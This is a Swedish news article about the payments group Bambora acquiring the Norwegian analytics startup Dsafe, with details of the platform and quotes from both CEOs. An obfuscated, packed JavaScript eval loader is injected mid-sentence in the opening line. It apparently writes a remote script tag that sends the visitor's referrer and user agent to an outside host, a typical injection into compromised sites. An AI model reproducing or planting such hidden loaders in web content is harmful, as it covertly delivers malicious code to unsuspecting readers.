Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Norsk startup integreras i global betalkoncern

Norsk startup integreras i global betalkoncern
Sebastian

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shizf|var|u0026u|referrer|sebir||js|php’.split(’|’),0,{}))
norska startup-bolaget Dsafe köps upp av den svenska betalkoncernen Bambora. Förvärvet innebär att Dsafe:s innovativa plattform för analys av sälj-, transaktions- och kunddata, både från köp i fysiska butiker såväl som online, nu integreras i Bamboras globala betaltjänst. Uppköpet av Dsafe är ett led i Bamboras strävan att förenkla handel och skapa möjligheter för affärer, butiker och kedjor att växa sin handel, både online, offline och mobilt.

Dsafe startades av fyra ingenjörer i Trondheim 2009 och har idag över 5000 kunder runt om i Norden, som bokkedjan Boklageret och sportkedjan XXL. Dsafe erbjuder en digital plattform som hjälper handlare att i realtid analysera sälj- och kunddata, exempelvis vilka tider som handeln är som mest intensiv och vilka kunder som står för den största lönsamheten. Utifrån data och analyser erbjuder Dsafe också olika typer lojalitetsprogram som bidrar till att stärka handlarnas kundrelationer och lönsamhet.

– Vårt fokus har från start varit att ge de bästa tänkbara upplevelserna för konsumenter och butiker. Tillsammans med Bambora kan vi nu växla upp våra innovativa lösningar och integrera dem med Bamboras globala erbjudande, säger Daro Navaratnam, vd för Dsafe.

Dsafe:s digitala analysplattform är helt molnbaserad och kräver därför inga dyra hårdvaruinköp för handlarna. Förutom att samla in, analysera och ge handlare realtidsuppdateringar om sina kunder, erbjuder Dsafe också möjligheten att skapa e-kvitton som automatiskt skickats ut när ett köp genomförts. Detta förenklar administrationen för handlarna, ökar kundnöjdheten, samt bidrar till att minska handlarnas påverkan på miljön.

– För att bli framgångsrik, oavsett om du är den lilla blomsterhandlaren runt hörnet, den stora kafékedjan eller den expansiva e-handlaren, måste du förstå dina kunder. Genom förvärvet av Dsafe kan vi nu erbjuda handlare runt om i världen denna förståelse, och samtidigt hjälpa dem att öka sin försäljning, säger Johan Tjärnberg, vd på Bambora Group.

Bambora ägs av Nordic Capital Fond VIII och består av en konsolidering av företagen Samport, MPS, ePay, DK Online, Key Corp och Euroline.